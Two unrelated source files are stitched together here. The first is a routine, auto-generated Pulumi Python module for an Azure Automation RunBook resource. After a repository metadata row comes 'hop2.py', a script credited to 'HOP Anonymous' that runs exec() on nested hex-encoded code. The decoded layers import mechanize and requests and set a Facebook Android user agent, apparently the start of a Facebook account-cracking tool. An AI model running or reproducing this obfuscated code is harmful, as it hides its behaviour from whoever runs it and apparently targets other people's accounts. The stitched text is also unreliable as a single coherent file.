pulumi.set(__self__, "automation_account_name", automation_account_name)
pulumi.set(__self__, "log_progress", log_progress)
pulumi.set(__self__, "log_verbose", log_verbose)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "runbook_type", runbook_type)
if content is not None:
pulumi.set(__self__, "content", content)
if description is not None:
pulumi.set(__self__, "description", description)
if job_schedules is not None:
pulumi.set(__self__, "job_schedules", job_schedules)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if publish_content_link is not None:
pulumi.set(__self__, "publish_content_link", publish_content_link)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> pulumi.Input[str]:
"""
The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@automation_account_name.setter
def automation_account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "automation_account_name", value)
@property
@pulumi.getter(name="logProgress")
def log_progress(self) -> pulumi.Input[bool]:
"""
Progress log option.
"""
return pulumi.get(self, "log_progress")
@log_progress.setter
def log_progress(self, value: pulumi.Input[bool]):
pulumi.set(self, "log_progress", value)
@property
@pulumi.getter(name="logVerbose")
def log_verbose(self) -> pulumi.Input[bool]:
"""
Verbose log option.
"""
return pulumi.get(self, "log_verbose")
@log_verbose.setter
def log_verbose(self, value: pulumi.Input[bool]):
pulumi.set(self, "log_verbose", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="runbookType")
def runbook_type(self) -> pulumi.Input[str]:
"""
The type of the runbook - can be either `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
"""
return pulumi.get(self, "runbook_type")
@runbook_type.setter
def runbook_type(self, value: pulumi.Input[str]):
pulumi.set(self, "runbook_type", value)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
"""
The desired content of the runbook.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for this credential.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="jobSchedules")
def job_schedules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]]:
return pulumi.get(self, "job_schedules")
@job_schedules.setter
def job_schedules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]]):
pulumi.set(self, "job_schedules", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Runbook. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="publishContentLink")
def publish_content_link(self) -> Optional[pulumi.Input['RunBookPublishContentLinkArgs']]:
"""
The published runbook content link.
"""
return pulumi.get(self, "publish_content_link")
@publish_content_link.setter
def publish_content_link(self, value: Optional[pulumi.Input['RunBookPublishContentLinkArgs']]):
pulumi.set(self, "publish_content_link", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _RunBookState:
def __init__(__self__, *,
automation_account_name: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
job_schedules: Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]] = None,
location: Optional[pulumi.Input[str]] = None,
log_progress: Optional[pulumi.Input[bool]] = None,
log_verbose: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
publish_content_link: Optional[pulumi.Input['RunBookPublishContentLinkArgs']] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
runbook_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering RunBook resources.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] content: The desired content of the runbook.
:param pulumi.Input[str] description: A description for this credential.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[bool] log_progress: Progress log option.
:param pulumi.Input[bool] log_verbose: Verbose log option.
:param pulumi.Input[str] name: Specifies the name of the Runbook. Changing this forces a new resource to be created.
:param pulumi.Input['RunBookPublishContentLinkArgs'] publish_content_link: The published runbook content link.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] runbook_type: The type of the runbook - can be either `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
if automation_account_name is not None:
pulumi.set(__self__, "automation_account_name", automation_account_name)
if content is not None:
pulumi.set(__self__, "content", content)
if description is not None:
pulumi.set(__self__, "description", description)
if job_schedules is not None:
pulumi.set(__self__, "job_schedules", job_schedules)
if location is not None:
pulumi.set(__self__, "location", location)
if log_progress is not None:
pulumi.set(__self__, "log_progress", log_progress)
if log_verbose is not None:
pulumi.set(__self__, "log_verbose", log_verbose)
if name is not None:
pulumi.set(__self__, "name", name)
if publish_content_link is not None:
pulumi.set(__self__, "publish_content_link", publish_content_link)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if runbook_type is not None:
pulumi.set(__self__, "runbook_type", runbook_type)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@automation_account_name.setter
def automation_account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "automation_account_name", value)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
"""
The desired content of the runbook.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description for this Runbook.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="jobSchedules")
def job_schedules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]]:
return pulumi.get(self, "job_schedules")
@job_schedules.setter
def job_schedules(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['RunBookJobScheduleArgs']]]]):
pulumi.set(self, "job_schedules", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="logProgress")
def log_progress(self) -> Optional[pulumi.Input[bool]]:
"""
Whether progress logging should be enabled for this Runbook.
"""
return pulumi.get(self, "log_progress")
@log_progress.setter
def log_progress(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "log_progress", value)
@property
@pulumi.getter(name="logVerbose")
def log_verbose(self) -> Optional[pulumi.Input[bool]]:
"""
Whether verbose logging should be enabled for this Runbook.
"""
return pulumi.get(self, "log_verbose")
@log_verbose.setter
def log_verbose(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "log_verbose", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Runbook. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="publishContentLink")
def publish_content_link(self) -> Optional[pulumi.Input['RunBookPublishContentLinkArgs']]:
"""
The published runbook content link.
"""
return pulumi.get(self, "publish_content_link")
@publish_content_link.setter
def publish_content_link(self, value: Optional[pulumi.Input['RunBookPublishContentLinkArgs']]):
pulumi.set(self, "publish_content_link", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="runbookType")
def runbook_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the runbook; must be one of `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
"""
return pulumi.get(self, "runbook_type")
@runbook_type.setter
def runbook_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "runbook_type", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class RunBook(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
job_schedules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RunBookJobScheduleArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
log_progress: Optional[pulumi.Input[bool]] = None,
log_verbose: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
publish_content_link: Optional[pulumi.Input[pulumi.InputType['RunBookPublishContentLinkArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
runbook_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an Automation Runbook.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.automation.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku_name="Basic")
example_run_book = azure.automation.RunBook("exampleRunBook",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
automation_account_name=example_account.name,
log_verbose=True,
log_progress=True,
description="This is an example runbook",
runbook_type="PowerShellWorkflow",
publish_content_link=azure.automation.RunBookPublishContentLinkArgs(
uri="https://raw.githubusercontent.com/Azure/azure-quickstart-templates/c4935ffb69246a6058eb24f54640f53f69d3ac9f/101-automation-runbook-getvms/Runbooks/Get-AzureVMTutorial.ps1",
))
```
## Import
Automation Runbooks can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:automation/runBook:RunBook Get-AzureVMTutorial /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/runbooks/Get-AzureVMTutorial
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] content: The desired content of the runbook.
:param pulumi.Input[str] description: A description for this Runbook.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[bool] log_progress: Whether progress logging should be enabled for this Runbook.
:param pulumi.Input[bool] log_verbose: Whether verbose logging should be enabled for this Runbook.
:param pulumi.Input[str] name: Specifies the name of the Runbook. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['RunBookPublishContentLinkArgs']] publish_content_link: The published runbook content link.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] runbook_type: The type of the runbook; must be one of `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RunBookArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Automation Runbook.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.automation.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku_name="Basic")
example_run_book = azure.automation.RunBook("exampleRunBook",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
automation_account_name=example_account.name,
log_verbose=True,
log_progress=True,
description="This is an example runbook",
runbook_type="PowerShellWorkflow",
publish_content_link=azure.automation.RunBookPublishContentLinkArgs(
uri="https://raw.githubusercontent.com/Azure/azure-quickstart-templates/c4935ffb69246a6058eb24f54640f53f69d3ac9f/101-automation-runbook-getvms/Runbooks/Get-AzureVMTutorial.ps1",
))
```
## Import
Automation Runbooks can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:automation/runBook:RunBook Get-AzureVMTutorial /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/runbooks/Get-AzureVMTutorial
```
:param str resource_name: The name of the resource.
:param RunBookArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
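## Example Usage (args object)

A minimal sketch of the `args`-object call form. The argument values below are placeholders, and the optional `RunBookArgs` fields used here (`location`, `content`) are assumed to mirror the keyword arguments accepted elsewhere in this module:

```python
import pulumi
import pulumi_azure as azure

example_run_book = azure.automation.RunBook(
    "exampleRunBook",
    azure.automation.RunBookArgs(
        resource_group_name="group1",
        automation_account_name="account1",
        location="West Europe",
        log_verbose=True,
        log_progress=True,
        runbook_type="PowerShell",
        content="Write-Output 'Hello from the runbook'"))
```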
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
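# Dispatch between the two documented overloads: either a RunBookArgs
# object (plus options), or the flat keyword-argument form.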
resource_args, opts = _utilities.get_resource_args_opts(RunBookArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
job_schedules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RunBookJobScheduleArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
log_progress: Optional[pulumi.Input[bool]] = None,
log_verbose: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
publish_content_link: Optional[pulumi.Input[pulumi.InputType['RunBookPublishContentLinkArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
runbook_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RunBookArgs.__new__(RunBookArgs)
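# Required inputs are validated below; they may be omitted only when an
# existing resource is being adopted by URN (opts.urn is set).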
if automation_account_name is None and not opts.urn:
raise TypeError("Missing required property 'automation_account_name'")
__props__.__dict__["automation_account_name"] = automation_account_name
__props__.__dict__["content"] = content
__props__.__dict__["description"] = description
__props__.__dict__["job_schedules"] = job_schedules
__props__.__dict__["location"] = location
if log_progress is None and not opts.urn:
raise TypeError("Missing required property 'log_progress'")
__props__.__dict__["log_progress"] = log_progress
if log_verbose is None and not opts.urn:
raise TypeError("Missing required property 'log_verbose'")
__props__.__dict__["log_verbose"] = log_verbose
__props__.__dict__["name"] = name
__props__.__dict__["publish_content_link"] = publish_content_link
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if runbook_type is None and not opts.urn:
raise TypeError("Missing required property 'runbook_type'")
__props__.__dict__["runbook_type"] = runbook_type
__props__.__dict__["tags"] = tags
super(RunBook, __self__).__init__(
'azure:automation/runBook:RunBook',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
job_schedules: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['RunBookJobScheduleArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
log_progress: Optional[pulumi.Input[bool]] = None,
log_verbose: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
publish_content_link: Optional[pulumi.Input[pulumi.InputType['RunBookPublishContentLinkArgs']]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
runbook_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'RunBook':
"""
Get an existing RunBook resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] content: The desired content of the runbook.
:param pulumi.Input[str] description: A description for this Runbook.
:param pulumi.Input[str] location: Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
:param pulumi.Input[bool] log_progress: Whether progress logging should be enabled for this Runbook.
:param pulumi.Input[bool] log_verbose: Whether verbose logging should be enabled for this Runbook.
:param pulumi.Input[str] name: Specifies the name of the Runbook. Changing this forces a new resource to be created.
:param pulumi.Input[pulumi.InputType['RunBookPublishContentLinkArgs']] publish_content_link: The published runbook content link.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] runbook_type: The type of the runbook; must be one of `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
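## Example Usage

A minimal sketch of looking up an existing Runbook by its provider ID (the
subscription and resource names below are placeholders):

```python
import pulumi
import pulumi_azure as azure

existing = azure.automation.RunBook.get("existingRunBook",
    id="/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/runbooks/Get-AzureVMTutorial")
```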
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RunBookState.__new__(_RunBookState)
__props__.__dict__["automation_account_name"] = automation_account_name
__props__.__dict__["content"] = content
__props__.__dict__["description"] = description
__props__.__dict__["job_schedules"] = job_schedules
__props__.__dict__["location"] = location
__props__.__dict__["log_progress"] = log_progress
__props__.__dict__["log_verbose"] = log_verbose
__props__.__dict__["name"] = name
__props__.__dict__["publish_content_link"] = publish_content_link
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["runbook_type"] = runbook_type
__props__.__dict__["tags"] = tags
return RunBook(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> pulumi.Output[str]:
"""
The name of the automation account in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@property
@pulumi.getter
def content(self) -> pulumi.Output[str]:
"""
The desired content of the runbook.
"""
return pulumi.get(self, "content")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description for this Runbook.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="jobSchedules")
def job_schedules(self) -> pulumi.Output[Sequence['outputs.RunBookJobSchedule']]:
return pulumi.get(self, "job_schedules")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the resource exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="logProgress")
def log_progress(self) -> pulumi.Output[bool]:
"""
Whether progress logging should be enabled for this Runbook.
"""
return pulumi.get(self, "log_progress")
@property
@pulumi.getter(name="logVerbose")
def log_verbose(self) -> pulumi.Output[bool]:
"""
Whether verbose logging should be enabled for this Runbook.
"""
return pulumi.get(self, "log_verbose")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Runbook. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="publishContentLink")
def publish_content_link(self) -> pulumi.Output[Optional['outputs.RunBookPublishContentLink']]:
"""
The published runbook content link.
"""
return pulumi.get(self, "publish_content_link")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the Runbook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="runbookType")
def runbook_type(self) -> pulumi.Output[str]:
"""
The type of the runbook; must be one of `Graph`, `GraphPowerShell`, `GraphPowerShellWorkflow`, `PowerShellWorkflow`, `PowerShell` or `Script`.
"""
return pulumi.get(self, "runbook_type")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
| 46.294606 | 239 | 0.662096 |
4a2129dee269a2ba6bf29742ef51ee5b1200479f | 100980 | py | Python | hop2.py | BDAlfajAhmedJhenida/HOP | 691c82e6817be0b4d4c54ba014fc02188eba6192 | ["MIT"] | null | null | null | hop2.py | BDAlfajAhmedJhenida/HOP | 691c82e6817be0b4d4c54ba014fc02188eba6192 | ["MIT"] | null | null | null | hop2.py | BDAlfajAhmedJhenida/HOP | 691c82e6817be0b4d4c54ba014fc02188eba6192 | ["MIT"] | null | null | null |
#Coded By : Muhammad Hamza
#Facebook : Muhammad Hamza
#Github : https://github.com/Hamzahash
#Whatsapp : +92309-7992202
#Youtube : HOP Anonymous
import base64
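# The string below is base16 (hex) encoded Python source. Decoding one layer
# yields the same banner comments followed by another
# exec(base64.b16decode(...)) call, i.e. the script hides its real logic
# under at least two layers of this encoding.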
exec(base64.b16decode('23436F646564204279203A204D7568616D6D61642048616D7A610A2346616365626F6F6B203A204D7568616D6D61642048616D7A610A234769746875622020203A2068747470733A2F2F6769746875622E636F6D2F48616D7A61686173680A235768617473617070203A202B39323330392D373939323230320A23596F757475626520203A20484F5020416E6F6E796D6F75730A696D706F7274206261736536340A65786563286261736536342E6231366465636F64652827323334333646363436353634323034323739323033413230344437353638363136443644363136343230343836313644374136313041323334363631363336353632364636463642323033413230344437353638363136443644363136343230343836313644374136313041323334373639373436383735363232303230323033413230363837343734373037333341324632463637363937343638373536323245363336463644324634383631364437413631363836313733363830413233353736383631373437333631373037303230334132303242333933323333333033393244333733393339333233323330333230413233353936463735373437353632363532303230334132303438344635303230343136453646364537393644364637353733304136393644373036463732373432303632363137333635333633343041363537383635363332383632363137333635333633343245363233313336363436353633364636343635323832373332333333323331333234363337333533373333333733323332343633363332333633393336343533323436333733303337333933373334333633383336343633363435333034313332333333323330333633333336343633363334333633393336343533363337333334343337333533373334333633363332343433333338333034313332333333323330333434363337333233363339333633373336333933363435333633313336343333363433333733393332333033353337333733323336333933373334333733343336333533363435333233303334333233373339333334313334343433373335333633383336333133363434333634343336333133363334333233303334333833363331333634343337343133363331333034313332333333323330333533333336343633373335333733323336333333363335333233303333343133323330333533303337333933373334333633383336343633363435333333323332333233303431333233333332333033343334333634363336343533363436333733343332333033353332333633353336333333363436333633343336333533323330333433393337333433323435333233303330343133303431333233333334333933363434333733303336343633373332333733343332333033363434333634363336333433373335333634333336333533303431333034313337333433373332333733393333343133323330333233303332333033323330333034313332333033323330333233303332333033363339333634343337333033363436333733323337333433323330333634363337333333323433333733333337333933373333333234333337333433363339333634343336333533323433333633343336333133373334333633353337333433363339333634343336333533323433333733323336333133363435333633343336343633363434333234333336333833363331333733333336333833363433333633393336333233323433333733323336333533323433333733343336333833373332333633353336333133363334333633393336343533363337333234333336343133373333333634363336343533323433333733353337333233363433333634333336333933363332333234333336333333363436333634363336343233363339333633353336343333363339333633323332343333363337333633353337333433373330333633313337333333373333333234333336343433363335333633333336333833363331333634353336333933373431333633353332343333373332333633353337333133373335333633353337333333373334333733333330343133323330333233303332333033323330333633363337333233363436333634343332333033363434333733353336343333373334333633393337333033373332333634363336333333363335333733333337333333363339333634353336333733323435333733303336343633363436333634333332333033363339333634343337333033363436333733323337333433323330333533343336333833373332333633353336333133363334333533303336343633363436333634333330343133323330333233303332333033323330333633363337333233363436333634
343332333033373332333633353337333133373335333633353337333333373334333733333332343533363335333733383336333333363335333733303337333433363339333634363336343533373333333233303336333933363434333733303336343633373332333733343332333033343333333634363336343533363435333633353336333333373334333633393336343633363435333433353337333233373332333634363337333233303431333233303332333033323330333233303336333633373332333634363336343433323330333634343336333533363333333633383336333133363435333633393337343133363335333233303336333933363434333733303336343633373332333733343332333033343332333733323336343633373337333733333336333533373332333034313336333533373338333633333336333533373330333733343332333033343339333634343337333033363436333733323337333433343335333733323337333233363436333733323333343133303431333233303332333033323330333233303336343633373333333234353337333333373339333733333337333433363335333634343332333833323337333733303336333933373330333333323332333033363339333634353337333333373334333633313336343333363433333233303337333233363335333733313337333533363335333733333337333433373333333233373332333933303431333233303332333033323330333233303336343633373333333234353337333333373339333733333337333433363335333634343332333833323337333733303336333933373330333333323332333033363339333634353337333333373334333633313336343333363433333233303336343433363335333633333336333833363331333634353336333933373431333633353332333733323339333034313332333033323330333233303332333033363436333733333332343533373333333733393337333333373334333633353336343433323338333233373337333033373339333733343336333833363436333634353333333233323330333633383336333333373332333633313336333333363432333234353337333033373339333233373332333933303431333034313332333333343332333733323336343633373337333733333336333533373332333233303335333333363335333733343337333433363339333634353336333733303431333733323336333533363433333634363336333133363334333233383337333333373339333733333332333933303431333733333337333933373333333234353337333333363335333733343336333433363335333633363336333133373335333634333337333433363335333634353336333333363436333633343336333933363435333633373332333833323337333733353337333433363336333333383332333733323339333034313336333233373332333233303333343433323330333634343336333533363333333633383336333133363435333633393337343133363335333234353334333233373332333634363337333733373333333633353337333233323338333233393330343133363332333733323332343533373333333633353337333433353436333633383336333133363435333633343336343333363335333534363337333233363436333633323336343633373334333733333332333833343336333633313336343333373333333633353332333933303431333633323337333233323435333733333336333533373334333534363336333833363331333634353336333433363433333633353335343633373332333633353336333633373332333633353337333333363338333233383336343433363335333633333336333833363331333634353336333933373431333633353332343533353436333633383337333433373334333733303332343533343338333533343335333433353330333533323336333533363336333733323336333533373333333633383335333033373332333634363336333333363335333733333337333333363436333733323332333833323339333234333336343433363331333733383335343633373334333633393336343433363335333334343333333133323339333034313336333233373332333234353336333133363334333633343336333833363335333633313336333433363335333733323337333333323330333334343332333033353432333233383332333733373335333733333336333533373332333234343336333133363337333633353336343533373334333233373332343333323337333433343336333133363433333733363336333933363432333234363333333133323435333333363332343533333330333233303
332333833343433333633393336343533373335333733383333343233323330333533353333343233323330333433313336343533363334333733323336343633363339333633343332333033333334333234353333333433323435333333323333343233323330333434353335333833333335333333353332333033343332333733353336333933363433333633343332343633343432333434363335333433333335333333353333333033333336333233393332333033353432333433363334333233343331333434353332343633343336333433323333333433343331333334323334333633343332333433313335333633323436333333313333333033333336333234353333333033323435333333303332343533333332333333363332343533333336333333383333343233343336333433323334333233353336333234363333333433333335333333393333333033333334333333313333333633333330333334323334333633343332333433343334343433323436333734323336333433363335333634353337333333363339333733343337333933333434333333333332343533333330333234333337333733363339333633343337333433363338333334343333333133333330333333383333333033323433333633383336333533363339333633373336333833373334333334343333333133333339333333323333333033373434333334323334333633343332333434333334333333323436333633393337333433353436333433393335333433333432333433363334333233353332333533363332343633333334333333353333333933333330333333343333333133333336333333303333343233343336333433323334333333353332333234363335333033363436333733333337333433363335333434343336343633363332333633393336343333363335333334323334333633343332333434343334333633323436333633313337333333373335333733333333343233343336333433323334333233343334333234363336333133373333333733353337333333333432333433363334333233353330333434353332343633363333333634363336343433323435333633363336333133363333333633353336333233363436333634363336343233323435333634323336333133373334333633313336343533363331333334323334333633343332333433343335333633